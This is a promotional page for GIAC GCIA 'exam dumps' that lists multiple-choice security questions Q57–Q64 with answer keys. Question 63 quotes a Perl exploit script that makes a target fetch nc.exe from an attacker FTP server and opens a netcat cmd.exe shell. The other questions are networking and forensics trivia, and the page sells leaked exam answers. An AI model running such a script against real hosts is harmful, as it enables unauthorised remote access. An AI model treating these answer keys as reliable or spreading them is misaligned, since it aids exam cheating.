♥♥ 2018 NEW RECOMMEND ♥♥

★ Pass on Your First TRY ★ 100% Money Back Guarantee ★ Realistic Practice Exam Questions

Free Instant Download NEW GCIA Exam Dumps (PDF & VCE):
Available on: https://www.exambible.com/GCIA-exam/

Your success in GIAC GCIA is our sole target and we develop all our GCIA braindumps in a way that facilitates the attainment of this target. Not only is our GCIA study material the best you can find, it is also the most detailed and the most updated. GCIA Practice Exams for GIAC GCIA are written to the highest standards of technical accuracy.

Q57. Which of the following is known as a message digest? 

A. Hash function 

B. Hashing algorithm 

C. Spider 

D. Message authentication code 

Answer: A


Q58. You work as a Network Administrator for McNeil Inc. The company's Windows 2000-based network is configured with Internet Security and Acceleration (ISA) Server 2000. You want to configure intrusion detection on the server. You find that the different types of attacks on the Intrusion Detection tab page of the IP Packet Filters Properties dialog box are disabled. What is the most likely cause? 

A. The PPTP through ISA firewall check box on the PPTP tab page of the IP Packet Filters Properties dialog box is not enabled. 

B. The Enable IP routing check box on the General tab page of the IP Packet Filters Properties dialog box is not selected. 

C. The Log packets from Allow filters check box on the Packet Filters tab page of the IP Packet Filters Properties dialog box is not enabled. 

D. The Enable Intrusion detection check box on the General tab page of the IP Packet Filters Properties dialog box is not selected. 

Answer: D


Q59. Which of the following techniques is used to identify attacks originating from a botnet? 

A. IFilter 

B. BPF-based filter 

C. Passive OS fingerprinting 

D. Recipient filtering 

Answer: C


Q60. For a host to have successful Internet communication, which of the following network protocols are required? You should assume that the users will not manually configure the computer in anyway and that the measure of success will be whether the user can access Web sites after powering the computer and logging on. 

Each correct answer represents a complete solution. Choose all that apply. 

A. DNS 

B. HTTP/HTTPS 

C. DHCP 

D. NTP 

Answer: ABC


Q61. John works as a Network Administrator for DigiNet Inc. He wants to investigate failed logon attempts to a network. He uses Log Parser to detail out the failed logons over a specific time frame. He uses the following commands and query to list all failed logons on a specific date: 

logparser.exe file:FailedLogons.sql -i:EVT -o:datagrid 

SELECT 

timegenerated AS LogonTime, 

extract_token(strings, 0, '|') AS UserName 

FROM Security 

WHERE EventID IN (529; 

530; 

531; 

532; 

533; 

534; 

535; 

537; 

539) 

AND to_string(timegenerated,'yyyy-MM-dd HH:mm:ss') like '2004-09%' 

After investigation, John concludes that two logon attempts were made by using an expired account. Which of the following EventID refers to this failed logon? 

A. 532 

B. 531 

C. 534 

D. 529 

Answer: A


Q62. Which of the following is the correct order of digital investigations Standard Operating Procedure (SOP)? 

A. Request for service, initial analysis, data collection, data reporting, data analysis 

B. Initial analysis, request for service, data collection, data analysis, data reporting 

C. Initial analysis, request for service, data collection, data reporting, data analysis 

D. Request for service, initial analysis, data collection, data analysis, data reporting 

Answer: D


Q63. Adam, a malicious hacker performs an exploit, which is given below: 

################################################################# 

$port = 53; 

# Spawn cmd.exe on port X 

$your = "192.168.1.1";# Your FTP Server 89 

$user = "Anonymous";# login as 

$pass = 'noone@nowhere.com'# password

 ################################################################# 

$host = $ARGV[0]; 

print "Starting ...\\n"; 

print "Server will download the file nc.exe from $your FTP server.\\n"; system("perl msadc.pl -h $host -C \\"echo 

open $your >sasfile\\""); system("perl msadc.pl -h $host -C \\"echo $user>>sasfile\\""); 

system("perl msadc.pl -h $host -C \\"echo $pass>>sasfile\\""); 

system("perl msadc.pl -h $host -C \\"echo bin>>sasfile\\""); 

system("perl msadc.pl -h $host -C \\"echo get nc.exe>>sasfile\\""); 

system("perl msadc.pl -h $host -C \\"echo get hacked. html>>sasfile\\""); 

system("perl msadc.pl -h $host -C \\"echo quit>>sasfile\\""); 

print "Server is downloading ... \\n"; 

system("perl msadc.pl -h $host -C \\"ftp \\-s\\:sasfile\\""); 

print "Press ENTER when 

download is finished ... 

(Have a ftp server)\\n"; 

$o=; print "Opening ...\\n"; 

system("perl msadc.pl -h $host -C \\"nc -l -p $port -e cmd.exe\\""); print "Done.\\n"; 

#system("telnet $host $port"); exit(0); 

Which of the following is the expected result of the above exploit? 

A. Creates a share called "sasfile" on the target system 

B. Opens up a SMTP server that requires no username or password 

C. Creates an FTP server with write permissions enabled 

D. Opens up a telnet listener that requires no username or password 

Answer: D


Q64. Which of the following statements about User Datagram Protocol (UDP) is true? 

A. It is a hardware protocol. 

B. It is a connectionless protocol. 

C. It is a tunneling protocol. 

D. It is a connection-oriented protocol. 

Answer: B